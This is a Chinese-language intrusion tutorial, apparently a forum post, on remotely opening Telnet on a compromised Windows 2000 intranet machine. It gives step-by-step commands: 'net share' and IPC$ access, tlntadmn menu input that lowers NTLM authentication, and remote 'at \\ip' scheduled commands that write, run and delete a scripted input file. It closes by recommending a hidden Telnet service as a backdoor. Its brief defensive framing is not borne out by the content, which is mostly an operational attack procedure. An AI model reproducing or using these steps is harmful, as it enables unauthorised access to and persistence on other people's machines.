Telnet服務的Tlntadmn修改問題
對于Telnet的使用中,它的入侵問題一直都令我們擔憂。那么如何進行保護和防范呢?這里我們需要了解攻擊的原理。下面我們就介紹一下Telnet服務被入侵的過程吧。這樣也可以讓我們對防止這類事情有所幫助。在入侵中,得到管理員帳號之后,很多事情顯得輕而易舉,可有時候幸運之神并不是總落在你身上的,這不,剛剛溢出成功內網的機器,本想用IPC$連接上去,竟發現"網絡路徑不存在",看來有必要先運行一次:net share /y 啟動共享服務,顯示成功后,終于連接搞定了!不過在接下來的開Telnet服務中便遇到了NTLM認證的問題,搬出自己習慣使用的工具:不依賴于IPC共享的VBS腳本,連忙傳上去.運行之后卻顯示不成功,納悶了.只能驅貓上線,繼續我那無期的學習之路了,半晌終于找到一篇關開打開Telnet的教學,在再三測試后終于成功打開了那部機器的Telnet,經驗不敢獨享,寫出來與大家共賞.
我們知道WIN2000中自帶Tlntadmn命令,它可以更改Telnet的端口、運行參數、最大登錄人數等等,可惜討厭的NTLM認證會讓我們遠程無法登陸,現在我們需要的是擺脫NTLM認證的問題:
方法1:手動修改Tlntadmn:
我們按下面的命令直接在本地CMD下操作:
- C:\WINNT\system32>tlntadmn.exe
- Microsoft (R) Windows 2000 (TM) (內部版本號 2195)
- Telnet Server Admin (Build 5.00.99201.1)
請在下列選項中選擇一個:
0) 退出這個應用程序
1) 列出當前用戶
2) 結束一個用戶的會話 ...
3) 顯示 / 更改注冊表設置 ...
4) 開始服務
5) 停止服務
請鍵入一個選項的號碼 [0 - 5] 以選擇該選項:
選3回車進入設置,進入如下子界面:
請在下列選項中選擇一個:
0) 退出這個菜單
1) AllowTrustedDomain
2) AltKeyMapping
3) DefaultDomain
4) DefaultShell
5) LoginScript
6) MaxFailedLogins
7) NTLM
8) TelnetPort
請鍵入一個選項的號碼 [0 - 8] 以選擇該選項:
我們選7,回車進入設置:NTLM的當前值=2,我們給它設置成1就可以了.設置完成后重啟Telnet服務:net stop Telnet、net start Telnet,再在本地連接23端口,輸入管理員帳號密碼就OK了!手動修改NTLM的方法就這么簡單,在平時入侵的時候,如果有3389等遠程連接方式,推薦大家使用這樣的方法去修改.#p#
方法2:利用腳本修改Tlntadmn:
有時我們出于特殊原因不要求立即停止Telnet服務或是變更NTLM模式,這時我們必須借助AT命令:at \\IP time 程序名,但實際上操作的話我們會發現:類似tlntadmn這樣的程序是控制臺的一個交互式工具,其參數設置并不能很好的被AT命令所調用,我們應如何處理呢?換句話說在沒有3389等遠程登陸的模式下,如何給方便的給對方開啟Telnet服務呢?我們可以將命令寫入一個txt文件,再加以調用.寫入的命令請按照下面的順序:
停止服務(5)->更改設置(3)->NTLM(7)->確認更改(y)->修改NTLM當前值(0)->再次確認(y)->退出菜單(0)->啟動服務(4)->退出程序(0)
在方法1中我們知道在每個選擇后面都要回車確認運行,所以我們要模擬操作寫入的數據應是:
5(回車)3(回車)7(回車)y(回車)0(回車)y(回車)0(回車)4(回車)0(回車)
現在我們有二種思路接下去做:一是直接在被入侵機器的CMD上制作txt文件以供調用;二是在本地生成txt再上傳到被入侵機器以供調用.
下面我們看他們分別是如何實現的:
1.直接在被入侵機器的CMD上制作txt文件以供調用.依次在cmd下如此運行命令:
- at \\ip time "echo 5 > c:\Telnet.txt"
- at \\ip time "echo 3 >> c:\Telnet.txt"
- at \\ip time "echo 7 >> c:\Telnet.txt"
- at \\ip time "echo y >> c:\Telnet.txt"
- at \\ip time "echo 0 >> c:\Telnet.txt"
- at \\ip time "echo y >> c:\Telnet.txt"
- at \\ip time "echo 0 >> c:\Telnet.txt"
- at \\ip time "echo 4 >> c:\Telnet.txt"
- at \\ip time "echo 0 >> c:\Telnet.txt"
- at \\ip time "c:\winnt\system32\tlntadmn.exe < c:\Telnet.txt"
- at \\ip time "del c:\Telnet.txt /f"
只須按上面的命令行一行行打入運行就可以了.效果與方法1是等同的.
2.在本地生成txt再上傳到被入侵機器以供調用.在本地機器上做一個Telnet.txt文件,內容如下:
5 3 7 y 0 y 0 4 0
注意每一行都要加回車,然后將這個文件上傳到被入侵機器的C:盤下:
copy Telnet.txt \\ip\c$
再設置在某時間內啟動并刪除巳上傳文件: at \\ip time "c:\winnt\system32\tlntadmn.exe < c:\Telnet.txt" at \\ip time "del c:\Telnet.txt /f"
很簡單的dos管道重定向原理,這樣就完成tlntadmn的交互過程.效果與方法A是等同的,簡單那吧?
Tlntadmn在處理Telnet上顯得異常強大,在入侵過程中如果能熟練應用它,那么開放Telnet服務將顯得輕而易舉,當然,隱蔽的Telnet服務也就是肉雞上最好的后門了!你學會了嗎?